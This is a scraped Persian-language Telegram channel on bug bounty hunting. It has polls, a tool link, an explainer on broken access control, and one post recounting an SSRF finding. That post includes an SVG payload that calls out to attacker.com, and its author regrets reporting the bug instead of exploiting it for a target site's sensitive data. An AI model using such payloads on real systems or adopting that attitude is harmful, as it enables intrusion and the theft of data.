BugBountySource | امنیت وب
203 subscribers
10 photos
4 links
Download Telegram
یکی از کامل ترین cheetSheet هایی که دیدم 🔥

@BugBountySource |
🔥4
دوست دارین بیشتر راجب کدوم باگ ها اطلاعات بدیم ؟
Anonymous Poll
45%
Client-side (Xss,...)
55%
Server-side (Ssrf,...)
میخوام راجب هر باگی که شد و علاقه داشتید
براتون رایتاپ هاشو بخونم و خلاصشو اینجا بهتون توضیح بدم و بگم از چه متودولوژیی استفاده کرده و چکارا کرده که تونسته به سیستم نفوذ کنه و چجوری باگ رو از p4 تبدیل کرده به p2 و یا p1 !
🔥4❤1
یه سری ابزار ها هستند معروف نیستن ولی یک هکر با خلاقت و یادگیری ک خودش داشته این ابزاروهارو کاستوم کرده ، اکثرشون بدرد نمیخورن ولی یه سریاشون واقعه فوق العادن!

یکی از اونا این ابزاره:
-X-Snifer🔥

اصلا نیاز به توضیح من نداره عکس باز کنید کارایی که میتونه انجام بده و نوشته 🔥☄️

اطلاعات بیشتر و نصبش از لینک گیتهابش میتونید بخونید و استفاده کنید :

🌐 : https://github.com/Whomrx666/X-snifer
🔥2
یکی اومده می‌گه من باگ بانتی کار می‌کنم (یعنی باگ گزارش می‌ده پول می‌گیره) پرسیده آیا هوش مصنوعی باعث از بین رفتن شغلمون می‌شه؟ نه عزیزم هوش مصنوعی اتفاقا شغل شمارو رونق می‌ده، کد ها همه باگی قراره بشن.


@BugBountySource />
🔥2
وقتی اولین باگم رو گرفتم به شدت هیجان زده شدم و باعث شد یک اشتباه خیلی بزرگ بکنم!
عکس بالارو ببینید !
داخل یک وبسایت میتونستم برای پروفایلم عکس بزارم.خب تا اینجا که مشکلی نداره ! تست کردم ببینم چه فرمت هایی قبول میکنه SVG , PNG , JPEG دیدم عههه چ جالب فرمت SVG هم قبول میکنه و انگار برنامه نویس یادش رفته این فرمت فیلتر کنه !

چی از این بهتر؟؟؟ یک فایل SVG بیسیک ولی با لینک دامین خودم داخلش روی پروفایلم آپلود کردم دیدم سرور وبسایت طرف داره درخواست DNS , HTTP میزنه !!! من بعد از مدت هااا یک باگ SSRF پیدا کردههههه بودم ! ولی یک اشتباه خیلی بزرگ و آماتوریی کردم ، بجای اکسپلوییت کردنش و دسترسی به دادهای حساس اون وبسایت این باگ گزارش دادم و نتیجش شد عکس بالا :) حداقل 2000 هزار دلار از دستم رفت و این گزارشم باگ p5 بهش خورد و بانتیی بهم ندادن !َ

اگر برنامه نویس وب و یا امنیت وب کار میکنی وارد کانالم شو چون قراره بهترین تریک ها و بهترین تجربه هارو باهم به اشتراک بزاریم :)♡
🔥4😁2🤔1🤯1
BugBountySource | امنیت وب
وقتی اولین باگم رو گرفتم به شدت هیجان زده شدم و باعث شد یک اشتباه خیلی بزرگ بکنم! عکس بالارو ببینید ! داخل یک وبسایت میتونستم برای پروفایلم عکس بزارم.خب تا اینجا که مشکلی نداره ! تست کردم ببینم چه فرمت هایی قبول میکنه SVG , PNG , JPEG دیدم عههه چ جالب فرمت…
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<link xmlns="http://www.w3.org/1999/xhtml" rel="stylesheet" href="http://attacker.com/style.css" type="text/css"/>
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
</svg>


این payload که ازش استفاده کردم و باعث شد باگ ssrf بخوره!
🔥3👏1🏆1
باگ های Broken access control مثل یک گنجینه برای هکراست ! و میدونی بدیه این باگ چیه؟؟؟
بیشترین احتمال پیدا کردن یک باگ در وبسایت ها Broken access control هستش ، دلیلیشم واضحه : برنامه نویسا به شدت اشتباه میکنن !

دسترسی کامل به حساب های یوزر های یک وبسایت ، دسترسی کامل به حساب ادمین یک وبسایت فقط بخش کوچیکی از تبعات پیدا کردن این باگ داخل یک وبسایته !

پستای بعدی حسابی میخوایم راجب این باگ صحبت کنیم و اگر شد یه نمونه واقعیشو هم باهم تست میکنیم 🔥
🔥2👏1
BugBountySource | امنیت وب
باگ های Broken access control مثل یک گنجینه برای هکراست ! و میدونی بدیه این باگ چیه؟؟؟ بیشترین احتمال پیدا کردن یک باگ در وبسایت ها Broken access control هستش ، دلیلیشم واضحه : برنامه نویسا به شدت اشتباه میکنن ! دسترسی کامل به حساب های یوزر های یک وبسایت…
خب اصلا بیایم ببینیم داستان این باگ چیه و چ داستانیی پشتشه که اینقدر خطرناک و پرتکراره !

فرض کنید من قراره برم داخل بانک و جلوی این بانک یک نگهبان ایستاده ، قبل از ورود من به بانک باید از من یک کارت مخصوص همون بانک بگیره تا منو بشناسه و بزاره برم داخل بانک ، من بجای کارت بانکی کارت دانشجوییم بهش نشون میدم و اون میگه بفرما داخل به بانک خوش آمدید !
به همین راحتی میتونم به بانک ورود کنم و هرکار دلم خواست بکنم بدون اینکه احراز هویت جلوم رو بگیره !

تا اینجای کار این مثال رو داشته باشید و بهش فکر کنید و جایگزینش کنید با اطلاعات و نقش هایی ک از یک
وبسایت میدونید...

پست بعدی سه اصل مهم راجب این باگ براتون مثال میزنم تا حتی اونی که دانش صفرم از این مسائل داره متوجه شه این باگ دقیقا چی هستش 🔥

این کانال رو دنبال کن قراره کلی تِریک و تجربه داخلش اشتراک بزاریم ⚜🍻
🔥4👏2❤1🏆1
چیزی که باعث میشه یک هکر انگیزه اینو بگیره که یک سیستم یا وبسایت نابود کنه و یا تست نفوذ روش بزنه بخشیش پوله ، و یک بخشه جالبیش ، حس رقابت با برنامه نویساس ، من خودم به شخصه روی پروگرم که کار میکنم اصلا توی کَتَم نمیره یک برنامه نویس کدش امن باشه و من هرجور شده باید شکستش بدم 😄

این هم انگیزه برای برنامه نویسه و هم برای هانتر!
من عاشق برنامه نویسیم که به امنیت کدش اهمیت نمیده و از هوش مصنوعی برای نوشتن کدش استفاده میکنه ! همین درسته 👌

نظر تو به عنوان برنامه نویس چیه :)؟
😁4👍2👎1👏1
کدوم bypass براتون جذاب تره تا مفصل باهم نقد برسیش کنیم و روش هاشو تست کنیم؟
Anonymous Poll
38%
Authentication Bypass
24%
Authorization Bypass
23%
WAF Bypass
22%
Rate Limit Bypass
29%
Captcha Bypass
29%
2FA / MFA Bypass
29%
Subscription / Plan Bypass
BugBountySource | امنیت وب
خب اصلا بیایم ببینیم داستان این باگ چیه و چ داستانیی پشتشه که اینقدر خطرناک و پرتکراره ! فرض کنید من قراره برم داخل بانک و جلوی این بانک یک نگهبان ایستاده ، قبل از ورود من به بانک باید از من یک کارت مخصوص همون بانک بگیره تا منو بشناسه و بزاره برم داخل…
بیایم پرونده این باگ ببندیم و کاملش کنیم 🔥

Access control bugs :
این باگ از سه اصل مهم پیروی میکنه سه اصلی ک حداقل یکیشون داخل یک وبسایت رندوم میتونی پیدا کنی (اکثریت) !

(توضیحاتی که راجب این باگ بهتون میدم مختصر و مفیدترین حالت ممکنه ، برای اطلاعات بیشتر تحقیق کنید)


1.Vertical access controls :
یک کاربر با سطح دسترسی پایین (Display) به سطح دسترسی بالا برسد ( Admin ) !


2.Horizontal access controls :
یک کاربر (user1) به اطلاعات و امکانات کاربر دیگر (user2) با همان سطح ، دسترسی پیدا کند!


3.Context-dependent access controls :
بسته به موقعیت و شرایط خاص کاربر ، کاربر بتونه از این شرایط بیرون بیاد و دورشون بزنه .
🔥6🤨2❤1👏1